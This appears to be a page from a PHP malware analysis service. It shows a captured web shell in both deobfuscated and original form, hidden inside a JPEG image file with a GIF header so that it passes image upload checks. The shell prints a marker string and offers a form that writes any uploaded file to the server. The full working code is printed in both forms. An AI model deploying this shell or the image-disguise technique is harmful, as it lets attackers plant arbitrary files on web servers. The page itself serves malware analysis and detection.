PHP Malware Analysis

Back to list

Tags

Input
_POST

Deobfuscated code

����JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
��C




��C		

��PP"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG�=_�Z�$�i=���7���m#,1����ר�B�Z~1^t�2:}�O�)��9�\+o6�a����B�u��W�ףNq�c�Q�
(������R�@{��K
�H�uQTW����W{5{�����]���ݮ_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u����[����"u�5a�)�_>W�|;�E�"��n�6�ʼn���oI�eQ^y�E+�Q�1������ڮ�����3W��D�E��%M�=��:�:�0��y�j�(���0�G����@��_�m'��҆>_��e?�ܻ�j����h��D/�sp�۟�m��.Zf����𥢊���*4��VjX�f��Q��ͻ�e�+�^��F[�ܤeͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|���>�Ҽ��d��4���_iz.�>���3WB8�"��\��#p��)��絯iz��"��?+WEI�MI��ɵo�ڕ�f�)z�����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=<!DOCTYPE html>
<?php 
print_r("SH3LLF0UND");
if ($_POST) {
    if (@copy($_FILES["0"]["tmp_name"], $_FILES["0"]["name"])) {
        echo "Y";
    } else {
        echo "N";
    }
} else {
    echo "\r\n<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";
}


Original code

����JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
��C




��C		

��PP"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�"�E�x�}�^�L2[G����'�-�v��EIƜy�Tc�rO��-okZڳG�=_�Z�$�i=���7���m#,1����ר�B�Z~1^t�2:}�O�)��9�\+o6�a����B�u��W�ףNq�c�Q�
(������R�@{��K
�H�uQTW����W{5{�����]���ݮ_�7�[��+��+^D���}�FS^^�}�X�m���@�W��23+.�_�j��}����QEw��)�R��KY��u����[����"u�5a�)�_>W�|;�E�"��n�6�ʼn���oI�eQ^y�E+�Q�1������ڮ�����3W��D�E��%M�=��:�:�0��y�j�(���0�G����@��_�m'��҆>_��e?�ܻ�j����h��D/�sp�۟�m��.Zf����𥢊���*4��VjX�f��Q��ͻ�e�+�^��F[�ܤeͻܿ{o�W�W�BW�c���?�4�WI��m溑c�6�F���j��ڕ��.�Y'�_3�5��F�c�ۈl���l|���>�Ҽ��d��4���_iz.�>���3WB8�"��\��#p��)��絯iz��"��?+WEI�MI��ɵo�ڕ�f�)z�����\���Z���E"��e���7AY���c�[�����1�/ѫ��}��T����GIF89a=<!DOCTYPE html>
<? print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"
<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>